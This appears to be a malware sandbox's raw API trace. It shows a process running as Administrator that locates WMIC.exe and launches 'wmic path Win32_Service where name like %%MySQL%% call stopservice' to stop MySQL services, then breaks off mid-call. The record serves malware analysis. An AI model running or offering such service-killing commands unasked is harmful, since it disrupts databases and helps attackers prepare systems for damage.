lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.302] SetErrorMode (uMode=0x1) returned 0x1 [0248.302] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.303] SetErrorMode (uMode=0x1) returned 0x1 [0248.303] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.303] SetErrorMode (uMode=0x1) returned 0x1 [0248.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0248.303] SetErrorMode (uMode=0x1) returned 0x1 [0248.304] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.304] SetErrorMode (uMode=0x1) returned 0x1 [0248.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0248.304] SetErrorMode (uMode=0x1) returned 0x1 [0248.304] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.304] SetErrorMode (uMode=0x1) returned 0x1 [0248.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0248.305] SetErrorMode (uMode=0x1) returned 0x1 [0248.305] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.305] SetErrorMode (uMode=0x1) returned 0x1 [0248.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0248.305] SetErrorMode (uMode=0x1) returned 0x1 [0248.305] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.306] SetErrorMode (uMode=0x1) returned 0x1 [0248.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0248.306] SetErrorMode (uMode=0x1) returned 0x1 [0248.306] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0248.306] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c94d650 | out: lpFindFileData=0x1c94d650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0248.306] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0248.307] SetErrorMode (uMode=0x1) returned 0x1 [0248.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c94d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0248.307] SetErrorMode (uMode=0x1) returned 0x1 [0248.307] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c94d970 | out: lpFileInformation=0x1c94d970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0248.307] SetErrorMode (uMode=0x1) returned 0x1 [0248.308] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0248.308] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c94db58, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c94db58) returned 0x4550 [0248.309] CoTaskMemFree (pv=0x1b9b1010) [0248.309] GetConsoleWindow () returned 0x5011e [0248.310] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0248.310] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0248.310] CoTaskMemFree (pv=0x2af7b0) [0248.310] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0248.310] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0248.310] CoTaskMemFree (pv=0x2af7b0) [0248.310] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice", pNumArgs=0x1c94dba0 | out: pNumArgs=0x1c94dba0) returned 0x1ee760*="" [0248.310] lstrlenW (lpString="path") returned 4 [0248.310] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa630 [0248.310] RtlMoveMemory (in: Destination=0x1b9aa630, Source=0x1ee7a2, Length=0xa | out: Destination=0x1b9aa630) [0248.310] CoTaskMemFree (pv=0x1b9aa630) [0248.310] lstrlenW (lpString="Win32_Service") returned 13 [0248.310] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0248.310] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee7ac, Length=0x1c | out: Destination=0x1b9b1010) [0248.310] CoTaskMemFree (pv=0x1b9b1010) [0248.310] lstrlenW (lpString="where") returned 5 [0248.310] CoTaskMemAlloc (cb=0xe) returned 0x1b9aa630 [0248.311] RtlMoveMemory (in: Destination=0x1b9aa630, Source=0x1ee7c8, Length=0xc | out: Destination=0x1b9aa630) [0248.311] CoTaskMemFree (pv=0x1b9aa630) [0248.311] lstrlenW (lpString="name like '%%MySQL%%'") returned 21 [0248.311] CoTaskMemAlloc (cb=0x2e) returned 0x1b9c7170 [0248.311] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x1ee7d4, Length=0x2c | out: Destination=0x1b9c7170) [0248.311] CoTaskMemFree (pv=0x1b9c7170) [0248.311] lstrlenW (lpString="call") returned 4 [0248.311] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa630 [0248.311] RtlMoveMemory (in: Destination=0x1b9aa630, Source=0x1ee800, Length=0xa | out: Destination=0x1b9aa630) [0248.311] CoTaskMemFree (pv=0x1b9aa630) [0248.311] lstrlenW (lpString="stopservice") returned 11 [0248.311] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0248.311] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x1ee80a, Length=0x18 | out: Destination=0x1b9b1010) [0248.311] CoTaskMemFree (pv=0x1b9b1010) [0248.311] LocalFree (hMem=0x1ee760) returned 0x0 [0248.311] CoTaskMemAlloc (cb=0x804) returned 0x1b9e4250 [0248.311] GetConsoleTitleW (in: lpConsoleTitle=0x1b9e4250, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0248.312] CoTaskMemFree (pv=0x1b9e4250) [0248.312] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0248.312] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c94db00*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31a6580 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice", lpProcessInformation=0x31a6580*(hProcess=0x67c, hThread=0x678, dwProcessId=0xb90, dwThreadId=0x83c)) returned 1 [0248.321] CoTaskMemFree (pv=0x253f20) [0248.321] CloseHandle (hObject=0x678) returned 1 [0248.321] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0248.321] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c94dba8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c94dba8) returned 0x4550 [0248.322] CoTaskMemFree (pv=0x1b9b1010) [0248.322] GetCurrentProcess () returned 0xffffffffffffffff [0248.322] GetCurrentProcess () returned 0xffffffffffffffff [0248.322] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x67c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c94dc88, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c94dc88*=0x678) returned 1 [0249.164] CloseHandle (hObject=0x678) returned 1 [0249.164] GetExitCodeProcess (in: hProcess=0x67c, lpExitCode=0x1c94dcf8 | out: lpExitCode=0x1c94dcf8*=0x0) returned 1 [0249.165] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0249.166] CloseHandle (hObject=0x67c) returned 1 [0249.167] SetEvent (hEvent=0x648) returned 1 [0249.167] SetEvent (hEvent=0x63c) returned 1 [0249.167] SetEvent (hEvent=0x640) returned 1 [0249.167] SetEvent (hEvent=0x644) returned 1 [0249.167] SetEvent (hEvent=0x658) returned 1 [0249.167] SetEvent (hEvent=0x64c) returned 1 [0249.167] SetEvent (hEvent=0x650) returned 1 [0249.167] SetEvent (hEvent=0x654) returned 1 [0249.167] SetEvent (hEvent=0x65c) returned 1 [0249.167] CoUninitialize () Thread: id = 187 os_tid = 0x73c [0249.192] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0249.194] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0249.195] VirtualQuery (in: lpAddress=0x1c9cd800, lpBuffer=0x1c9ce6c0, dwLength=0x30 | out: lpBuffer=0x1c9ce6c0*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0249.197] VirtualQuery (in: lpAddress=0x1c9cdab0, lpBuffer=0x1c9ce970, dwLength=0x30 | out: lpBuffer=0x1c9ce970*(BaseAddress=0x1c9cd000, AllocationBase=0x1c040000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0249.200] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0249.200] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0249.200] CoTaskMemFree (pv=0x2af7b0) [0249.200] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0249.200] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0249.201] CoTaskMemFree (pv=0x2af7b0) [0249.201] CoTaskMemAlloc (cb=0x20e) returned 0x2bc8d0 [0249.201] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bc8d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0249.201] CoTaskMemFree (pv=0x2bc8d0) [0249.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.202] SetErrorMode (uMode=0x1) returned 0x1 [0249.202] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.202] SetErrorMode (uMode=0x1) returned 0x1 [0249.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.203] SetErrorMode (uMode=0x1) returned 0x1 [0249.203] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.203] SetErrorMode (uMode=0x1) returned 0x1 [0249.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.203] SetErrorMode (uMode=0x1) returned 0x1 [0249.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.204] SetErrorMode (uMode=0x1) returned 0x1 [0249.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.205] SetErrorMode (uMode=0x1) returned 0x1 [0249.205] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.205] SetErrorMode (uMode=0x1) returned 0x1 [0249.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.205] SetErrorMode (uMode=0x1) returned 0x1 [0249.206] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.206] SetErrorMode (uMode=0x1) returned 0x1 [0249.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.206] SetErrorMode (uMode=0x1) returned 0x1 [0249.206] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.207] SetErrorMode (uMode=0x1) returned 0x1 [0249.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.207] SetErrorMode (uMode=0x1) returned 0x1 [0249.207] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.208] SetErrorMode (uMode=0x1) returned 0x1 [0249.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.208] SetErrorMode (uMode=0x1) returned 0x1 [0249.208] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.208] SetErrorMode (uMode=0x1) returned 0x1 [0249.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.209] SetErrorMode (uMode=0x1) returned 0x1 [0249.209] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.209] SetErrorMode (uMode=0x1) returned 0x1 [0249.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.210] SetErrorMode (uMode=0x1) returned 0x1 [0249.210] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.210] SetErrorMode (uMode=0x1) returned 0x1 [0249.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.211] SetErrorMode (uMode=0x1) returned 0x1 [0249.211] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.211] SetErrorMode (uMode=0x1) returned 0x1 [0249.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.212] SetErrorMode (uMode=0x1) returned 0x1 [0249.212] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.212] SetErrorMode (uMode=0x1) returned 0x1 [0249.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.212] SetErrorMode (uMode=0x1) returned 0x1 [0249.213] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c9cd9e0 | out: lpFindFileData=0x1c9cd9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0249.213] SetErrorMode (uMode=0x1) returned 0x1 [0249.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cd840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0249.213] SetErrorMode (uMode=0x1) returned 0x1 [0249.213] FindFirstFileW (in: 